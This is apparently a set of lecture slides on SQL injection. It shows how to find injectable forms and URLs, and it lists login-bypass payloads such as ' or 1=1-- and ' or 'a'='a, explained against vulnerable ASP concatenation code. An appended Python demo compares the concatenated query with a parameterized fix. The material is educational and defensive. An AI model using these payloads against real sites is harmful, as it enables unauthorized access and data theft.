- SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy.
- It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.
71 What You Should Look for?
- Try to look for pages that allow you to submit data, i.e.
- login page,
- search page,
- feedback, etc.
- Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this:
    <FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>
- Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit-wise).
72 What If You Can't Find Any Page That Takes Input?
- You should look for pages like ASP, JSP, CGI, or PHP web pages.
- Try to look especially for URLs that take parameters, like http://duck/index.asp?id=10
73 How Do You Test If It Is Vulnerable?
- Start with a single quote trick. Input something like hi' or 1=1-- into the login, or the password, or even the URL.
- Example:
    Login: hi' or 1=1--
    Pass: hi' or 1=1--
    http://duck/index.asp?id=hi' or 1=1--
- If luck is on your side, you will get logged in without any login name or password.
74 Hidden Field
- If you must do this with a hidden field, just download the source HTML from the site, save it on your hard disk, and modify the URL and hidden field accordingly.
- Example:
    <FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>
75 Database Table Example [CQU]
76 Database Table: product
    PName      PCategory   price  number  bar code
    bread      food          30     100  100-234-7
    cake       food         300      20  100-987-6
    cookie     food          50      70  100-812-9
    model car  toy          200      20  300-567-7
    figure     toy          300      80  300-987-9
    paper      stationery   0.5    5000  981-897-7
    pen        stationery    20     300  981-967-0
77 Web Application Input and Its Corresponding SQL Query
- Take an ASP page that will link you to another page with the following URL: http://duck/index.asp?category=food
- In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, the ASP page might contain the following code:
    v_cat = request("category")
    sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs = conn.execute(sqlstr)
- As we can see, our value is placed into v_cat, and thus the SQL statement becomes:
    SELECT * FROM product WHERE PCategory='food'
- The query returns a result set containing one or more rows that match the WHERE condition, in this case 'food'.
78 Why ' or 1=1-- ?
- Now, assume that we change the URL into something like this: http://duck/index.asp?category=food' or 1=1--
- Now our variable v_cat equals "food' or 1=1-- ", and if we substitute this in the SQL query we will have
    SELECT * FROM product WHERE PCategory='food' or 1=1--'
- The query now selects everything from the product table, regardless of whether PCategory is equal to 'food' or not.
- A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote (').
- Sometimes it may be possible to replace the double dash with a single hash "#" (MySQL).
79 Other Crafted Input (1)
- However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try ' or 'a'='a. The SQL query will now become
    SELECT * FROM product WHERE PCategory='food' or 'a'='a'
- It should return the same result.
80 Other Crafted Input (2)
- Depending on the actual SQL query, you may have to try some of these possibilities:
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or 'a'='a
- " or "a"="a
- ') or ('a'='a
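An added example, not from the slides, that runs the crafted inputs of slides 73 and 78-80 against the product table of slide 76 with the query from slide 77, first built by string concatenation the way the ASP code does, then with a bound parameter. It uses Python's built-in SQLite in place of MS SQL Server (an assumption; SQLite understands the same -- comment), so only the single-quote variants are exercised: SQLite treats double-quoted strings as identifiers, so the " variants would behave differently here than on the slide's target.

```python
import sqlite3

# The product table from slide 76 (the "bar code" column is named barcode here).
PRODUCTS = [
    ("bread", "food", 30, 100, "100-234-7"),
    ("cake", "food", 300, 20, "100-987-6"),
    ("cookie", "food", 50, 70, "100-812-9"),
    ("model car", "toy", 200, 20, "300-567-7"),
    ("figure", "toy", 300, 80, "300-987-9"),
    ("paper", "stationery", 0.5, 5000, "981-897-7"),
    ("pen", "stationery", 20, 300, "981-967-0"),
]

# Crafted inputs from slides 73 and 78-80 (single-quote variants only).
PAYLOADS = ["food", "food' or 1=1--", "food' or 'a'='a", "or 1=1--", "hi' or 1=1--"]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PName TEXT, PCategory TEXT, "
                 "price REAL, number INTEGER, barcode TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?, ?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, v_cat: str) -> list:
    """The ASP pattern from slide 77: the request value is pasted into the
    SQL text, so quotes and comment markers in it become part of the query."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return [row[0] for row in conn.execute(sqlstr)]


def search_parameterized(conn: sqlite3.Connection, v_cat: str) -> list:
    """The fix: the value is bound as a parameter and never parsed as SQL,
    so food' or 1=1-- is just a category name that matches nothing."""
    return [row[0] for row in conn.execute(
        "SELECT * FROM product WHERE PCategory=?", (v_cat,))]


def run_payloads(conn: sqlite3.Connection) -> dict:
    """For each crafted input: product names from the concatenated query (or
    the error it raises) beside those from the parameterized one."""
    results = {}
    for p in PAYLOADS:
        try:
            vuln = search_vulnerable(conn, p)
        except sqlite3.Error as e:
            vuln = f"error: {e}"
        results[p] = (vuln, search_parameterized(conn, p))
    return results


if __name__ == "__main__":
    for payload, (vuln, safe) in run_payloads(make_db()).items():
        print(f"{payload!r:22} concatenated  -> {vuln}")
        print(f"{'':22} parameterized -> {safe}")
```

The quoteless variant "or 1=1--" stays harmless against this query because the whole value lands inside the single quotes; it is the form to try when the parameter is numeric and unquoted, as in index.asp?id=10.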